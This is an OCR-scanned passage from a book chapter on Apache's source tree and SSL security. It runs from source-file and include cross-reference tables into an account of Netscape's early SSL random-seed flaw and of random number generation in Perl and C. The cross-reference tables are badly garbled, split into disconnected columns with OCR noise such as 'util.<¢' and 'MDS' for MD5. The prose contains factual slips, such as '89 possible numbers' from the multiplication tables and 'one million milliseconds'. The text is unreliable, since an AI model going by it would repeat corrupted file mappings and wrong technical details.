Implements the TransferLog directive 

Cache uses apr_hash functions 

Sends/gets MIME headers for requests 

MIME type lookup via file magic numbers 

Tracks MIME types the client will accept 

Proxy module 

Uses a rule-based rewriting engine 

Sets environment variables based on matching request headers 
Loads Apache modules at runtime 

Spelling module 

Apache Interface to OpenSSL 

Displays Apache internal performance data 

Provides safe execution of CGI 

Generates a unique identifier for each request 
Implements the UserDir command 

User Tracking Module (was mod_cookies.c) 

Support for dynamically configured mass virtual hosting 
Core Win32 
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TABLE 14.1 Continued 





File 


Purpose 





mpm_netware.c 
mpm_winnt.c 
mpmt_os2.c 

props.c 
proxy_connect.c 
proxy_ftp.c 
proxy_http.c 
proxy_util.c 
registry.c 
service.c 
sl_engine_ds.c 
ssl_engine_config.c 
ssl_engine_dh.c 
ssl_engine_ext.c 
ssl_engine_init.c 
ssl_engine_io.c 
ssl_engine_kernel.c 
ssl_engine_log.c 
ssl_engine_mutex.c 
ssl_engine_pphrase.c 
ssl_engine_rand.c 
ssl_engine_vars.c 
ssl_expr.c 
ssl_expr_eval.c 
ssl_scache.c 
ssl_scache_dbm.c 
ssl_scache_shmcb.c 
ssl_scache_shmht.c 
ssl_util_ssl.c 
ssl_util_table.c 
util.c 

util_lock.c 
Win9xConHook.c 


NetWare MPM 

Winnt MPM 

Multiprocess, multithreaded MPM for OS/2 
DAV Property database handling 

CONNECT method for Apache proxy 

FTP proxy module 

HTTP routines for Apache proxy 

Utility routines for Apache proxy 

Functions to handle the Win32 registry 

Run as a service in Winnt 

Additional SSL data structures 

Apache Interface to OpenSSL 

Diffie-Hellman built-in temporary parameters 
SSL extensions to other Apache parts 
Initialization of servers 

I/O functions 

The SSL engine kernel 

The SSL logging facility 

Semaphore for mutual exclusion 

Pass phrase dialog 

Random number generator seeding 

SSL engine variable lookup facility 

SSL expression handling 

SSL expression evaluation 

SSL session cache: common abstraction layer 
SSL session cache via DBM 

SSL session cache via shared memory 
Session cache via shared memory (hash table variant) 
Additional utility functions for OpenSSL 

High performance hash table functions 

DAV utilities extension module for Apache 2.0.x 
DAV repository-independent lock functions 
Win9xConHook.dll (a hook proc to clean up Win95/98 console behavior) 





Include File Cross-Reference 


The following section shows include file associations to major C source files. 
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ap_config.h 
Include [buildmark.c, 55] buildmark.c 
Include [config.c, 85] config.c 
Include [connection.c, 63] connection.c 
Include [core.c, 72] core.c 


Include [gen_test_char.c, 67] gen_test_char.c 








Include [listen.c, 67] listen.c 
Include [log.c, 87] log.c 
Include [main.c, 69] main.c 
Include [mpmt_os2.c, 86] mpmt_os2.c 
Include [mpmt_os2_child.c, 64] mpmt_os2_child.c 
Include [mpm_netware.c, 104] mpm_netware.c 
Include [perchild.c, 82] perchild.c 
Include [prefork.c, 78] prefork.c 
Include [spmt_os2.c, 63] spmt_os2.c 
Include [threaded.c, 87] threaded.c 
Include [mpm_winnt.c, 71] mpm_winnt.c 
Include [worker.c, 96] worker.c 
Include [protocol.c, 79] protocol.c 
Include [request.c, 77] request.c 
Include [rfc1413.c, 92] rfc1413.c 
Include [scoreboard.c, 71] scoreboard.c 
Include [util.c, 89] util.c 
Include [util_charset.c, 59] util_charset.c 
Include [util_ebedic.c, 59] util_ebcdic.c 
Include [util_md5.c, 88] util_md5.c 
Include [util _seript.c, 71] util_script.c 
Include [vhost.c, 72] vhost.c 


ap_listen.h 
Include [listen.c, 70] listen.c 


Include [beos.c, 79] beos.c 
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Include [mpmt_os2.c, 96] mpmt_os2.c 
Include [mpmt_os2_child.c, 74] mpmt_os2_child.c 
Include [mpm_netware.c, 115] mpm_netware.c 
Include [perchild.c, 93] perchild.c 
Include [prefork.c, 90] prefork.c 
Include [spmt_os2.c, 73] spmt_os2.c 
Include [threaded.c, 97] threaded.c 
Include [mpm_winnt.h, 62] mpm_winnt.h 
Include [mpm_winnt.c, 72] mpm_winnt.c 
Include [worker.c, 106] worker.c 
Include [mpm_common.c, 83] mpm_common.c 
ap_mmn.h 


Include [mpm_netware.c, 116] mpm_netware.c 


Include [prefork.c, 91] prefork.c 
ap_mpm.h 

Include [connection.c, 68] connection.c 

Include [main.c, 77] main.c 

Include [beos.c, 77] beos.c 

Include [mpmt_os2.c, 95] mpmt_os2.c 


Include [mpmt_os2_child.c, 73] mpmt_os2_child.c 


Include [mpm_netware.c, 113] mpm_netware.c 


Include [perchild.c, 90] perchild.c 
Include [prefork.c, 87] prefork.c 
Include [spmt_os2.c, 72] spmt_os2.c 
Include [threaded.c, 94] threaded.c 
Include [mpm_winnt.c, 70] mpm_winnt.c 
Include [worker.c, 103] worker.c 
Include [mpm_common.c, 82] mpm_common.c 


Include [scoreboard.c, 77] scoreboard.c 


apr.h 
Include 
Include 
Include 
Include 
Include 
Include 
Include 
Include 
Include 
Include 
Include 
Include 
Include 
Include 
Include 
Include 


Include 


apr_base64.h 


Include 


[config.c, 74] 
[connection.c, 59] 
[core.c, 59] 
[gen_test_char.c, 59] 
[log.c, 66] 
[main.c, 59] 
[mpm_netware.c, 82] 
[prefork.c, 59] 
[threaded.c, 59] 
[worker.c, 66] 
[mpm_common.c, 70] 
[protocol.c, 66] 
[rfc1413.c, 82] 
[scoreboard.c, 59] 
[util.c, 72] 

[util seript.c, 59] 


[vhost.c, 64] 


[util.c, 90] 


apr_buckets.h 


Include 
Include 


Include 


apr_date.h 


Include 


[core.c, 84] 
[error_bucket.c, 56] 


[protocol.c, 68] 


[util_script.c, 80] 


config.c 
connection.c 
core.c 
gen_test_char.c 
log.c 
main.c 
mpm_netware.c 
prefork.c 
threaded.c 
worker.c 
mpm_common.c 
protocol.c 
rfc1413.¢c 
scoreboard.c 
util.<¢ 
util_script.c 


vhost.c 


util.« 


core.c 
error_bucket.c 


protocol.c 


util script.¢ 
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apr_errno.h 
Include [log.c, 69] log.c 


Include [fdqueue.h, 70] fdqueue.h 


apr_file_io.h 


Include [config.c, 77] config.c 
Include [perchild.c, 63] perchild.c 
Include [threaded.c, 62] threaded.c 
Include [worker.c, 69] worker.c 
Include [request.c, 70] request.c 


apr_fnmatch.h 
Include [core.c, 62] core.c 


Include [request.c, 71] request.c 


apr_general.h 
Include [log.c, 67] log.c 


Include [main.c, 62] main.c 


apr_getopt.h 


Include [main.c, 61] main.c 

Include [mpm_netware.c, 88] mpm_netware.c 

Include [mpm_winnt.c, 67] mpm_winnt.c 
apr_hash.h 

Include [core.c, 63] core.c 

Include [perchild.c, 59] perchild.c 


Include [util_filter.c,; 58] util filtere 


apr_hooks.h 


Include 


apr_inherit. 


Include 


apr_lib.h 
Include 
Include 
Include 
Include 
Include 
Include 
Include 
Include 
Include 
Include 
Include 


Include 





Include 


apr_lock.h 
Include 


Include 


apr_network_ 


Include 


Include 


[util_filter.c, 74] 


h 


[rfc1413.c, 86] 


[core.c, 61] 
[gen_test_char.c, 60] 
[log.c, 71] 
[main.c, 63] 
[mpm_winnt.c, 69] 
[service.c, 71] 
[protocol.c, 69] 
[rfc1413.c, 85] 
[scoreboard.c, 62] 
[util.c, 74] 

[util filter.c, 57] 
[util_script.c, 60] 


[vhost.c, 66] 


[listen.c, 61] 


[mpm_common.c, 74] 


io.h 
[listen.c, 59] 


[rfc1413.c, 83] 


util_filter.c 


rfc1413.c 


core.c 
gen_test_char.c 
log.c 
main.c 
mpm_winnt.c 
service.c 
protocol.c 
rfc1413.¢c 
scoreboard.c 
util.c 
util_filter.c 
util_script.c 


vhost.c 


listen.¢ 


mpm_common.c 


listen. ¢ 


rfc1413.c 
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apr_pools.h 


Include [perchild.c, 61] perchild.c 


apr_portable.h 





Include [config.c, 76] config.c 
Include [beos.c, 70] beos.c 
Include [mpmt_os2.c, 97] mpmt_os2.c 
Include [mpmt_os2_child.c, 75] mpmt_os2_child.c 
Include [mpm_netware.c, 83] mpm_netware.c 
Include [perchild.c, 62] perchild.c 
Include [prefork.c, 60] prefork.c 
Include [spmt_os2.c, 74] spmt_os2.c 
Include [threaded.c, 60] threaded.c 
Include [mpm_winnt.c, 66] mpm_winnt.c 
Include [worker.c, 67] worker.c 
Include [scoreboard.c, 61] scoreboard.c 
Include [util_md5.c, 89] util_md5.c 


apr_proc_mutex.h 


Include [worker.c, 73] worker.c 


apr_signal.h 


Include [log.c, 72] log.c 
Include [mpm_netware.c, 86] mpm_netware.c 
Include [perchild.c, 64] perchild.c 
Include [prefork.c, 63] prefork.c 
Include [threaded.c, 64] threaded.c 
Include [worker.c, 71] worker.c 
Include [mpm_common.c, 72] mpm_common.c 


Include [protocol.c, 70] protocol.c 
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apr_strings.h 


Include [config.c, 75] config.c 
Include [connection.c, 60] connection.c 
Include [core.c, 60] core.c 


Include [error_bucket.c, 57] error_bucket.c 


Include [listen.c, 60] listen.c 
Include [log.c, 68] log.c 
Include [main.c, 60] main.c 
Include [beos.c, 69] beos.c 
Include [mpmt_os2.c, 99] mpmt_os2.c 


Include [mpmt_os2_child.c, 77] mpmt_os2_child.c 





Include [mpm_netware.c, 84] mpm_netware.c 
Include [perchild.c, 60 perchild.c 
Include [prefork.c, 61] prefork.c 
Include [spmt_os2.c, 76] spmt_os2.c 
Include [threaded.c, 61 threaded.c 
Include [mpm_winnt.c, 68] mpm_winnt.c 
Include [registry.c, 79 registry.c 
Include [service.c, 70] service.c 
Include [worker.c, 68] worker.c 
Include [mpm_common.c, 73] mpm_common.c 
Include [protocol.c, 67] protocol.c 
Include [request.c, 69] request.c 
Include [rfc1413.c, 84] rfc1413.c 
Include [scoreboard.c, 60] scoreboard. c 
Include [util.c, 73] util.c 
Include [util _filter.¢, 59] util _filter.c 
Include [util_md5.c, 90] util_md5.c 
Include [util_script.c, 61] util_script.c 


Include [vhost.c, 65] vhost.c 
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apr_tables.h 


Include [mpm_netware.c, 87] mpm_netware.c 


apr_thread_cond.h 


Include [fdqueue.h, 67] fdqueue.h 


apr_thread_mutex.h 


Include [mpm_netware.c, 89] mpm_netware.c 
Include [fdqueue.h, 66] fdqueue.h 
Include [worker.c, 72] worker.c 


apr_thread_proc.h 


Include [core.c, 64] core.c 
Include [log.c, 70] log.c 
Include [mpm_netware.c, 85] mpm_netware.c 
Include [prefork.c, 62] prefork.c 
Include [threaded.c, 63] threaded.c 
Include [worker.c, 70] worker.c 
Include [mpm_common.c, 71] mpm_common.c 
apr_uri.h 
Include [main.c, 75] main.c 


apr_want.h 





Include [config.c, 81] config.c 
Include [core.c, 69] core.c 
Include [listen.c, 64] listen.c 
Include [log.c, 76] log.c 
Include [main.c, 66] main.c 
Include [mpm_netware.c, 93] mpm_netware.c 


Include 


Include 


Include 


Include 


Include 


Include 


Include 


Include 


Include 


Include 





Include 
Include 


Include 


apr_xml.h 


Include 


beosd.h 


Include 


fdqueue.h 
Include 


Include 


grp.h 


Include 


http_config. 
Include 


Include 


[perchild.c, 67] 
[prefork.c, 67] 
[threaded.c, 66] 
[worker.c, 75] 
[protocol.c, 75] 
[request.c, 74] 
[rfc1413.c, 90] 
[scoreboard.c, 65] 
[util.c, 78] 
[util_debug.c, 60] 
[util_filter.c, 56] 
[util_script.c, 64] 


[vhost.c, 69] 


[util_xml.c, 55] 


[beos.c, 78] 


[fdqueue.c, 59] 


[worker.c, 108] 


[perchild.c, 101] 


h 
[config.c, 87] 


[connection.c, 70] 


perchild.c 
prefork.c 
threaded.c 
worker.c 
protocol.c 
request.c 
rfc1413.¢c 
scoreboard.c 
utils 
util_debug.c 
util_filter.c 
util_script.c¢ 


vhost.c 


util_xml.c 


beos.c 


fdqueue.c 


worker.c 


perchild.c 


config.c 


connection.c 
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Include [core.c, 74] core.c 
Include [listen.c, 69] listen.c 
Include [log.c, 89] log.c 
Include [main.c, 73] main.c 
Include [beos.c, 74] beos.c 
Include [mpmt_os2.c, 91] mpmt_os2.c 


Include [mpmt_os2_child.c, 69] mpmt_os2_child.c 


Include [mpm_netware.c, 109] mpm_netware.c 








Include [perchild.c, 86] perchild.c 
Include [prefork.c, 83] prefork.c 
Include [spmt_os2.c, 68] spmt_os2.c 
Include [threaded.c, 91] threaded.c 
Include [mpm_winnt.c, 63] mpm_winnt.c 
Include [worker.c, 100] worker.c 
Include [mpm_common.c, 77] mpm_common.c 
Include [protocol.c, 81] protocol.c 
Include [request.c, 79] request.c 
Include [scoreboard.c, 76] scoreboard.c 
Include [util.c, 95] util.c 
Include [util_debug.c, 63] util_debug.c 
Include [util _seript.c, 73] util_script.c 
Include [vhost.c, 74] vhost.c 


http_connection.h 


Include [connection.c, 65] connection.c 
Include [core.c, 83] core.c 
Include [beos.c, 76] beos.c 
Include [mpmt_os2.c, 93] mpmt_os2.c 


Include [mpmt_os2_child.c, 71] mpmt_os2_child.c 
Include [mpm_netware.c, 111] mpm_netware.c 


Include [perchild.c, 89] perchild.c 
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Include [prefork.c, 85] prefork.c 
Include [spmt_os2.c, 70] spmt_os2.c 
Include [threaded.c, 93] threaded.c 
Include [mpm_winnt.c, 65] mpm_winnt.c 
Include [worker.c, 102] worker.c 
http_core.h 

Include [config.c, 89] config.c 
Include [core.c, 75] core.c 
Include [log.c, 90] log.c 
Include [beos.c, 75] beos.c 
Include [mpmt_os2.c, 92] mpmt_os2.c 


Include [mpmt_os2_child.c, 70] mpmt_os2_child.c 


Include [mpm_netware.c, 110] mpm_netware.c 


Include [perchild.c, 87] perchild.c 
Include [prefork.c, 84] prefork.c 
Include [spmt_os2.c, 69] spmt_os2.c 
Include [threaded.c, 92] threaded.c 
Include [mpm_winnt.c, 64] mpm_winnt.c 
Include [worker.c, 101] worker.c 
Include [protocol.c, 82] protocol.c 
Include [request.c, 81] request.c 
Include [scoreboard.c, 75] scoreboard.c 
Include [util_script.c, 76] util_script.c 
Include [util_xml.c, 60] util_xml.c 
Include [vhost.c, 78] vhost.c 
http_log.h 
Include [config.c, 90] config.c 
Include [connection.c, 73] connection.c 


Include [core.c, 80] core.c 
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Include [listen.c, 71] listen.c 
Include [log.c, 91] log.c 
Include [main.c, 72] main.c 
Include [beos.c, 73] beos.c 
Include [mpmt_os2.c, 90] mpmt_os2.c 


Include [mpmt_os2_child.c, 68] mpmt_os2_child.c 


Include [mpm_netware.c, 108] mpm_netware.c 











Include [perchild.c, 85 perchild.c 
Include [prefork.c, 82] prefork.c 
Include [spmt_os2.c, 67 spmt_os2.c 
Include [threaded.c, 90 threaded.c 
Include [mpm_winnt.c, 62] mpm_winnt.c 
Include [registry.c, 77 registry.c 
Include [service.c, 68] service.c 
Include [worker.c, 99] worker.c 
Include [mpm_common.c, 78] mpm_common.c 
Include [protocol.c, 87] protocol.c 
Include [request.c, 83] request.c 
Include [rfc1413.c, 94] rfc1413.c 
Include [scoreboard.c, 73] scoreboard. c 
Include [util.c, 93] util.c 
Include [util filter.c, 62] util _filter.c 
Include [util_seript.c, 75] util_script.c 
Include [util_xml.c, 59] util_xml.c 
Include [vhost.c, 75] vhost.c 
http_main.h 
Include [config.c, 92] config.c 
Include [core.c, 79] core.c 
Include [log.c, 92] log.c 


Include [main.c, 71] main.c 
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Include [beos.c, 72] beos.c 
Include [mpmt_os2.c, 89] mpmt_os2.c 
Include [mpmt_os2_child.c, 67] mpmt_os2_child.c 
Include [mpm_netware.c, 107] mpm_netware.c 
Include [perchild.c, 84] perchild.c 
Include [prefork.c, 81] prefork.c 
Include [spmt_os2.c, 66] spmt_os2.c 
Include [threaded.c, 89] threaded.c 
Include [mpm_winnt.c, 61] mpm_winnt.c 
Include [worker.c, 98] worker.c 
Include [mpm_common.c, 79] mpm_common.c 
Include [protocol.c, 84] protocol.c 
Include [request.c, 84] request.c 
Include [rfc1413.c, 96] rfc1413.c 
Include [scoreboard.c, 74] scoreboard.c 
Include [util.c, 92] util.c 
Include [util_script.c, 74] util_script.c 


http_protocol.h 


Include [config.c, 88] config.c 
Include [connection.c, 67] connection.c 
Include [core.c, 76] core.c 


Include [error_bucket.c, 55] error_bucket.c 


Include [perchild.c, 88] perchild.c 
Include [protocol.c, 83] protocol.c 
Include [request.c, 82] request.c 
Include [util.c, 94] [Uy er Aro} 
Include [util_script.c, 77] util_script.¢ 
Include [util_xml.c, 58] util_xml.c 


Include [vhost.c, 77] vhost.c 
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http_request.h 


Include [config.c, 91] config.c 
Include [connection.c, 66] connection.c 
Include [core.c, 77] core.c 
Include [protocol.c, 85] protocol.c 
Include [request.c, 80] request.c 
Include [util_script.c, 78] util_script.c 


http_vhost.h 


Include [config.c, 93] config.c 
Include [connection.c, 71] connection.c 
Include [core.c, 78] core.c 
Include [main.c, 74] main.c 
Include [protocol.c, 86] protocol.c 
Include [vhost.c, 76] vhost.c 
httpd.h 
Include [buildmark.c, 56] buildmark.c 
Include [config.c, 86] config.c 
Include [connection.c, 64] connection.c 
Include [core.c, 73] core.c 


Include [gen_test_char.c, 68] gen_test_char.c 


Include [listen.c, 68] listen.c 
Include [log.c, 88] log.c 
Include [main.c, 70] main.c 
Include [beos.c, 71] beos.c 
Include [mpm.h, 64] mpm.h 
Include [mpmt_os2.c, 87] mpmt_os2.c 


Include [mpmt_os2_child.c, 65] mpmt_os2_child.c 


Include [mpm_netware.c, 105] mpm_netware.c 





Include [mpm.h, 59] mpm.h 


Include 


Include 


Include 


Include 


Include 


Include 


Include 


Include 


Include 


Include 





Include 


Include 


Include 


Include 


Include 


Include 


Include 


Include 


Include 


Include 


Include 


Include 





Include 


io.h 


Include 


library.h 


Include 


[perchild.c, 83] 
[prefork.c, 79] 
[mpm.h, 64] 
[spmt_os2.c, 64] 
[threaded.c, 88] 
[mpm_winnt.c, 60] 
[registry.c, 76] 
[service.c, 67] 
[fdqueue.h, 61] 
[worker.c, 97] 
[mpm_common.c, 76] 
[protocol.c, 80] 
[request.c, 78] 
[rfc1413.c, 93] 
[scoreboard.c, 72] 
[util.c, 91] 
[util_debug.c, 62] 
[util filter.c, 61] 
[util_md5.c, 91] 
[util_script.c, 72] 
[util_xml.c, 57] 
[vhost.c, 73] 


[mpm.h, 59] 


[spmt_os2.c, 83] 


[mpm_netware.c, 126] 


perchild.c 
prefork.c 
mpm.h 
spmt_os2.c 
threaded.c 
mpm_winnt.c 
registry.c 
service.c 
fdqueue.h 
worker.c 
mpm_common.c 
protocol.c 
request.c 
rfc1413.¢c 
scoreboard.c 
util.c 
util_debug.c 
util_filter.c 
util_md5.c 
util_script.c 
util_xml.c 
vhost.c 


mpm.h 


spmt_os2.c 


mpm_netware.c 


Include File Cross-Reference 


329 


330 CHAPTER 14 Apache Under the Hood: Open Source and Security 


limits.h 
Include [threaded.c, 101] threaded.c 
Include [worker.c, 111] worker.c 
malloc.h 
Include [mpm_winnt.c, 76] mpm_winnt.c 
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Include [core.c, 87] core.c 
Include [listen.c, 72] listen.c 
Include [beos.c, 83] beos.c 
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Include [mpmt_os2_child.c, 76] mpmt_os2_child.c 
Include [mpm_netware.c, 114] mpm_netware.c 
Include [perchild.c, 92] perchild.c 
Include [prefork.c, 89] prefork.c 
Include [spmt_os2.c, 75] spmt_os2.c 
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socket.h 
Include [beos.c, 85] beos.c 
Include [fdqueue.h, 69] fdqueue.h 
stat.h 
Include [perchild.c, 103] perchild.c 
stdlib.h 
Include [spmt_os2.c, 79] spmt_os2.c 
Include [fdqueue.h, 62] fdqueue.h 


Include [util_cfgtree.c, 61] util_cfgtree.c 
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Surfing Apache’s source tree at length is unnecessary unless you plan to do extensive 
Apache development. However, familiarizing yourself with it—and where its security 
routines reside—is worth a few minutes. From this experience, you'll garner a much 
clearer understanding of its security model. 
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Apache/SSL e What Is SSL? 


e How Secure Is SSL? 
e mod_ssl 


Despite early market projections, electronic commerce e Installing Apache-SSL 


was no overnight success. Initially, this was because of the © Certificate Authorities 
public’s unfamiliarity with the Internet, but it eventually 
became clear that before online commerce could really e Commercial SSL Packages 


take hold, Web-based communication had to be secure. 
Plainly, users were reticent to send credit card data over 
the Internet, with good reason. 


By default, Web-based communication had several weak- 
nesses: 


e HTTP offers no encryption mechanism, and therefore 
third parties can sniff traffic between clients and the 
server. Thus, the user’s session offers little or no 
privacy. 


e HTTP is a stateless protocol—it doesn’t store informa- 
tion on users and therefore cannot verify a user’s 
identity. 


e HTTP provides no means to authenticate an ongoing 
session. Hence, it cannot determine whether a third, 
untrusted party has hijacked the current session. 


To address these shortcomings, Netscape Communications 
developed the Secure Sockets Layer Protocol, or SSL. 


What Is SSL? 


Secure Sockets Layer (SSL) is a three-tiered method that 
employs RSA and DES authentication and encryption, as 
well as additional MDS integrity checking. Using these 
methods, SSL addresses all three issues inherent in Web- 
based communication: 
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e At connection time, the client and server define a secret key, which is used to 
encrypt transiting data. Hence, though SSL traffic can be sniffed, it is encrypted 
and therefore difficult to unravel. 


e SSL supports public key cryptography, so the server can authenticate users 
using popular schemes such as RSA and the Digital Signature Standard (DSS). 


e The server can verify the integrity of ongoing sessions using message digest 
algorithms such as MDS and SHA. 


These features make SSL an excellent tool for securing electronic commerce transac- 
tions. 


How Secure Is SSL? 


SSL, like any technology invariably will, had a rocky start, beginning in September 
1995, when two Berkeley students—Ian Goldberg and David Wagner—announced 
that they had cracked Netscape’s random number generator scheme. 


This news rocked the electronic commerce community and prompted sensational 
media coverage. Here’s an excerpt from a New York Times article by John Markoff 
that appeared under the headline “Security Flaw Is Discovered in Software Used in 
Shopping”: 


A serious security flaw has been discovered in Netscape, the most popular software used for 
computer transactions over the Internet’s World Wide Web, threatening to cast a chill over the 
emerging market for electronic commerce. The flaw, which could enable a knowledgeable 
criminal to use a computer to break Netscape’s security coding system in less than a minute, 
means that no one using the software can be certain of protecting credit card information, 
bank account numbers, or other types of information that Netscape is supposed to keep 


private during online transactions. 


Though Netscape quickly addressed the issue, the story serves as a reminder that 
even excellent security tools can fail because of flawed implementation. 


Goldberg and Wagner began their analysis in the dark, chiefly because Netscape held 
back source code on certain vital elements of SSL. The students reverse engineered 
the code, and in the process discovered a major flaw in how Netscape generated 
random numbers. 


Random numbers have always been a problem in cryptography, even when func- 
tions used to derive them are fundamentally sound. This is because it’s difficult to 
generate a random number. 
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In this context, random refers to a quality with minimal predictability. In science 
and nature, many systems and cycles that initially appear to be chaotic or random 
do in fact have observable predictability. Often, the key to recognizing that 
predictability (or recognizing a pattern in a seemingly patternless phenomenon) is 
time. 


NOTE 


A simple example could be children playing jump rope with two ropes. Here, you have several 
variables: two ropes, two children, and two arms each. As they twirl and twist the ropes, you 
might think that the number of revolutions per minute and the positional relationship 
between each rope (at any given time) are random (or even chaotic). They're likely not. Over 
time, if you sample many uninterrupted hours of play (with these same two children and two 
ropes), a discernable pattern might emerge. 





Deriving random numbers is so difficult that scientists have turned to unconven- 
tional means. For example, some researchers focus their studies on chaos theory, or 
the mathematical study of chaotic structures. 


NOTE 


Perhaps the most interesting (or offbeat) step in this direction is the use of lava lamps to 
generate decent random numbers. To see such a project in action, visit LavaRand at 
http: //ww.lavarnd.org/. 





Meanwhile, to compensate for the current inability to computationally create “real” 
random numbers without help from outside chaotic systems, programmers rely on a 
complicated parlor trick. Instead of trying to derive a random number from natural 
phenomenon, programmers use functions that generate normal numbers and subject 
them to mathematical operations so complicated that the average human cannot 
anticipate the observable predictability within them. The resulting number is, for all 
purposes, “random enough.” Or is it? 


That depends on the steps programmers take to derive this random (or more appro- 
priately, pseudo-random) number. Every number has a starting point or seed source, 
and depending on that initial seed source, your so-called pseudo-random number 
might be fundamentally flawed from the start. 


For example, suppose that you derived your seed source from standard multiplica- 
tion tables (1x1 to 9x9). Here, you’d have 89 possible numbers (or multiplication 
values) to choose from. Anyone, even without pen and paper, could quickly identify 
all 89 combinations. 
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Your resulting number, therefore, would never be “random enough.” This was at the 
heart of SSL’s first vulnerability. Goldberg and Wagner determined that Netscape was 
using three values to generate the seed source for the initial secret key: 


e A process ID (PID) 
e A parent process ID (PPID) 


e The time (in seconds and microseconds) 


Because local users can easily obtain process IDs on Unix and Linux, Goldberg and 
Wagner needed only to ascertain the time. And, as they explain in their paper 
“Randomness and the Netscape Browser: How Secure Is the World Wide Web,” this 
was not difficult: 


Most popular Ethernet sniffing tools (including tcpdump) record the precise time they see each 
packet. Using the output from such a program, the attacker can guess the time of day on the 


system running the Netscape browser to within a second. 


Read the entire paper at 
http: //www.ddj.com/articles/1996/9601/9601h/9601h.htm. 


This effectively gave them the time in seconds. (Milliseconds, as they pointed out, 
were a trivial issue at best because there are only one million milliseconds per unit, 
an infinitesimally small range to search given today’s computing power.) The end 
result was that Goldberg and Wagner could crack Netscape’s early SSL in less than a 
minute in some cases. 


NOTE 


Sometimes, for short sessions, such schemes are suitable, providing you don’t expect more 
from them than their throwaway solution. For example, mod_user_track, an Apache module 
that provides tracking of user preferences and behavior through cookies, uses finite and easily 
discoverable values. Session IDs that mod_user_track generates consist of a client’s IP, the 
system time, and the server PID. As such, they aren’t random, anyone can generate them, 
and anyone can use them to impersonate other users. Therefore, in your work, don’t build 
applications that rely on them. They're great for short periods, but Apache never intended 
them for hardcore authentication. 


Where Do These Random Numbers Originate? 


These random numbers have to originate somewhere, right? Absolutely. Different 
programming languages offer different means of pseudo-random number generation. 
Let’s quickly look at them. 
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Perl and Randomness 
The Practical Extraction and Report Language provides two basic tools for generating 
random numbers: 


e srand()—To generate the seed 


e rand()—To generate the random number 


As described in Perl’s documentation, srand() 


Sets the random number seed for the rand() operator. If EXPR is omitted, it uses a semiran- 
dom value based on the current time and process ID, among other things. In versions of Perl 
prior to 5.004 the default seed was just the current time(). This isn’t a particularly good seed, 
so many old programs supply their own seed value (often time * $$ or time * ($$ + ($$ 


<< 15))), but that isn’t necessary any more. 


However, you needn’t call srand(), because rand() calls it anyway. However, 
although numbers you generate with rand() are suitable for short or throwaway 
tasks, they probably aren’t suited for serious security. As the documentation explains: 


Note that you need something much more random than the default seed for cryptographic 
purposes. Checksumming the compressed output of one or more rapidly changing operating 


system status programs is the usual method. For example: 


srand (time ^ $$ ^ unpack "%L*", ‘ps axww | gzip’); 


If you’re particularly concerned with this, see the Math: :TrulyRandom module in CPAN. 


The Math: : TrulyRandom package by Matt Blaze and Don Mitchell (with a significant 
contribution from Gary Howland) is available at 

http: //theoryx5.uwinnipeg.ca/scripts/CPAN/authors/id/G/GA/GARY/Math - 
TrulyRandom-1.0.tar.gz and represents an improvement on random number gener- 
ation in Perl. However, its author warns: 


Depending on the particular platform, truerand() output may be biased or correlated. In 
general, you can expect about 16 bits of “pseudo-entropy” out of each 32-bit word returned 
by truerand(), but it may not be uniformly diffused. You should therefore run the output 
through some post-whitening function (like MD5 or DES or whatever) before using it to 
generate key material. (RSAREF’s random package does this for you when you feed 


truerand() bits to the seed input function.) 
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Other Perl tools for generating random numbers include the following: 


e Math-LogRand-0.01—This Perl extension from Lee Goddard returns a random 
number with log weighting. It returns a “random” integer produced by the Perl 
rand() function, between input parameters, with weighting to low integers by 
log distribution. It is available at 
http: //theoryx5.uwinnipeg.ca/scripts/CPAN/authors/id/L/LG/LGODDARD/ 
Math-LogRand-0.01.tar.gz. 


e Math-Rand48-1.00—This package from Nick Ing-Simmons provides Perl bind- 
ings for the drand48() family of random functions (seed48, drand48, lrand48, 
mrand48, nrand48, jrand48). It is available at 
http://testers.cpan.org/search?request=dist ;dist=Math -Rand48. 


e Math-Random-0.64—Created by Geoffrey Rommel, Math: :Random is a Perl port 
of the C version of rand1lib, a suite of routines for generating random deviates. 
The port supports all the distributions from which the Fortran and C versions 
generate deviates. The major functionalities that are excluded are the multiple 
generators/splitting facility and antithetic random number generation. It is 
available for download at 
http: //theoryx5.uwinnipeg.ca/scripts/CPAN/authors/id/G/GR/GROMMEL/ 
Math-Random-0.64.tar.gz. 


e The Mersenne Twister, or Math-Random-MT-1.00—The Mersenne Twister is a 
pseudo-random number generator developed by Makoto Matsumoto and Takuji 
Nishimura. They described it in their paper at 
http: //www.math.keio.ac.jp/~nisimura/random/doc/mt.ps. The package is 
available at 
http: //theoryx5.uwinnipeg.ca/scripts/CPAN/authors/id/A/AM/AMS/Math- 
Random-MT-1.00.tar.gz. 


e Math-RandomOrg-0.02—This package from Gregory Williams retrieves random 
numbers and data from random.org, a true random number service on the 
Internet. To learn more about random.org, go to 
http: //www.random.org/essay.html. To obtain Math-RandomOrg-0.02, go to 
http: //theoryx5.uwinnipeg.ca/scripts/CPAN/authors/id/G/GW/GWILLIAMS/ 
Math-RandomOrg-0.02.tar.gz. 


C and Randomness 
Garden-variety C provides random number generation through rand(), included in 
stdlib.h (emphasis mine): 


The rand() function returns a pseudo-random integer between 0 and RAND_MAX. The srand() 
function sets its argument as the seed for a new sequence of pseudo-random integers to be 


returned by rand(). These sequences are repeatable by calling srand() with the same seed 
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value. If no seed value is provided, the rand() function is automatically seeded with a value of 


1. Random-number generation is a complex topic. 


Randomness 

Achieving randomness is more difficult than it first appears. The public paper that 

best discusses this issue from a general view is “Randomness Recommendations for 
Security,” also known as RFC 1750, by Donald Eastlake III, Stephen D. Crocker, and 
Jeffrey I. Schiller. 


Those gentlemen open their paper with the following statements: 


Security systems today are built on increasingly strong cryptographic algorithms that foil 
pattern analysis attempts. However, the security of these systems is dependent on generating 
secret quantities for passwords, cryptographic keys, and similar quantities. The use of pseudo- 
random processes to generate secret quantities can result in pseudo-security. The sophisti- 
cated attacker of these security systems may find it easier to reproduce the environment that 
produced the secret quantities, searching the resulting small set of possibilities, than to locate 
the quantities in the whole of the number space. Choosing random quantities to foil a 
resourceful and motivated adversary is surprisingly difficult. This paper points out many pitfalls 
in using traditional pseudo-random number generation techniques for choosing such quanti- 
ties. It recommends the use of truly random hardware techniques and shows that the existing 
hardware on many systems can be used for this purpose. It provides suggestions to ameliorate 
the problem when a hardware solution is not available. And it gives examples of how large 


such quantities need to be for some particular applications. 


If you’re truly interested in learning why random number schemes are dicey and 
why good ones are difficult to obtain, see RFC 1750, located at 
ftp://ftp.isi.edu/in-notes/rfc1750.txt. 


mod_ssl 
